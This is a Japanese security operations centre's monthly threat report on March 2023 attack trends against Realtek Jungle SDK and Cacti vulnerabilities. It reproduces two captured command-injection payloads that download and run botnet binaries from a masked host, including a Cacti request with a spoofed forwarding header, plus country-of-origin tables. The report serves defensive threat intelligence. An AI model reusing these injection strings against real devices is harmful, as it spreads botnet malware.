2023年3月度 MBSD-SOCの検知傾向トピックス
2023年3月度のMBSD-SOCにおける検知傾向トピックスです。
今月は、Realtek社製チップセット「Realtek Jungle SDK」の脆弱性(CVE-2021-35394)および運用監視ソフト「Cacti」の脆弱性(CVE-2022-46169)を狙った攻撃が増加しました。
下図は1月から4月までに検知した両製品の脆弱性を狙った攻撃の検知数推移です。両製品は、以前からボットネットマルウェアの標的にされており、弊社SOCでは断続的に攻撃を観測していましたが、3月下旬以降に攻撃が増加しました。
なお、Cactiの脆弱性は、2月に米国のサイバーセキュリティ・インフラストラクチャセキュリティ庁(CISA)が積極的に悪用されている脆弱性として、KEV(Known Exploited Vulnerabilities Catalog)へ追加し、注意喚起を促しています。
以下は、弊社SOCで実際に検知した攻撃パケットペイロードです。9034/udpポート宛への通信となっており、wgetコマンドにより不正なファイルをダウンロードして実行を試みた通信となっております。
orf; cd /tmp; rm -rf sora.mpsl; /bin/busybox wget http://xxx.xxx.xxx.xxx/bins/sora.mpsl; chmod +x sora.mpsl; ./sora.mpsl realtek; |
以下は、弊社SOCで実際に検知した攻撃パケットペイロードです。「remote_agent.php」のパラメータ「poller_id」に対して、wgetコマンドにより不正なファイルをダウンロードして実行を試みた通信となっています。
GET /remote_agent.php?action=polldata&local_data_ids%5B0%5D=1&host_id=1&poller_id=;cd+/tmp;rm+-rf+*;wget+http://xxx.xxx.xxx.xxx/bins/Paralysis.arm;chmod+777+Paralysis.arm;/tmp/Paralysis.arm+cacti HTTP/1.1 Host: example.com User-Agent: python-requests/2.27.1 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Forwarded-For: 127.0.0.1 |
なお、4月におけるRealtek Jungle SDKおよびCactiの脆弱性を狙った通信の攻撃元国の上位5件は以下の通りです。
# | Realtek Jungle SDKの脆弱性 (CVE-2021-35394) |
Cactiの脆弱性(CVE-2022-46169) | ||
1 | オランダ | 32.4% | アメリカ | 57.7% |
2 | アメリカ | 30.3% | フランス | 25.6% |
3 | ルクセンブルク | 19.1% | 日本 | 6.4% |
4 | スウェーデン | 10.0% | 中国 | 2.6% |
5 | ブルガリア | 5.7% | スウェーデン | 1.3% |
参考情報
関連記事